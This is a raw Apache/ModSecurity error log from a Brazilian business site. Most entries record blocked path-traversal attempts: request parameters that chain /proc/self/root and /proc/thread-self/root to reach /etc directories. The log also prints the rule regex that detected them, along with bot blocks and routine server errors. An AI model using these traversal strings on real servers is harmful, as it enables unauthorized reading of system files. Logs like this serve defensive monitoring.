[Thu Mar 19 07:51:36.200352 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:52000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVOBkFeYa1D6dYQnDY2QAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 07:51:47.768983 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:49150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVQ_-YZRR_7pZ7nDJ2qwAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:51:49.631482 2026] [core:alert] [pid 17887:tid 140411616036608] [client 57.141.18.107:48258] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:51:51.907061 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.228.61:36194] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvVR9a6ubjKNq_cu4Y0kQAAA0E"]
[Thu Mar 19 07:51:55.763518 2026] [core:alert] [pid 26799:tid 140411590858496] [client 57.141.18.48:48586] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:51:56.121785 2026] [proxy_fcgi:error] [pid 19093:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:52:05.544725 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.243.128:47482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVVRkFeYa1D6dYQnDY6gAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:52:15.659615 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:47488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVX-oXxyEfFpUF8f_4uwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:22.146982 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46684] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:52:24.452877 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:52408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVaMdf6f5d65gmYZRdtQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:27.049691 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:55836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVa_u8EFLIOrSqIpuLXwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:28.420469 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:55848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVbOoXxyEfFpUF8f_4yAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:52:45.137805 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:52:45.863411 2026] [:error] [pid 19093:tid 140411716749056] [client 74.7.243.128:60046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVfV_V7PWP6ixUYl6mMQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:48.479341 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:55390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVgAkwaGbbGflqUZClIAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:52.952544 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:33262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVhAbLMZ6AikZjR9VGLwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:52:55.464625 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:33264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVh9a6ubjKNq_cu4Y0xAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:53:11.137803 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:53:15.281968 2026] [mime_magic:error] [pid 27403:tid 140411666392832] (70014)End of file found: [client 57.141.18.24:50932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:53:18.806586 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:33274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVnvu8EFLIOrSqIpuLkwAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:53:30.023877 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:40384] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVqgkwaGbbGflqUZClPQAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:53:35.133856 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:53:40.200079 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:56206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvVs-yqAr6etmhZHNpMFAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:54:04.137806 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:49356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:54:10.496217 2026] [:error] [pid 27403:tid 140411574073088] [client 74.7.244.43:46072] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvV0hkFeYa1D6dYQnDZNAAAAdQ"]
[Thu Mar 19 07:54:28.129792 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:54:57.129840 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:55:36.129869 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:55:36.150597 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:51286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvWKP-YZRR_7pZ7nDJ3NgAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:55:47.853932 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.243.128:55278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvWM_u8EFLIOrSqIpuL4QAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:55:57.367036 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:42162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvWO-yqAr6etmhZHNpMVwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:56:13.229827 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52288] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:56:42.139186 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:56:45.733993 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 57.141.18.120:55344] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:57:03.403330 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.228.61:56484] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvWf_u8EFLIOrSqIpuL_wAAAk0"]
[Thu Mar 19 07:57:07.138502 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:57:14.016141 2026] [mime_magic:error] [pid 27293:tid 140411557287680] (70014)End of file found: [client 57.141.18.102:56158] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:57:15.413873 2026] [core:alert] [pid 17653:tid 140411666392832] [client 57.141.18.72:56156] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:57:28.153772 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54534] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:57:49.133836 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55112] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:58:02.954241 2026] [mime_magic:error] [pid 15826:tid 140411540502272] (70014)End of file found: [client 57.141.18.83:58262] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:58:10.143656 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:58:32.155369 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:58:54.133787 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56876] AH01075: Error dispatching request to : (polling)
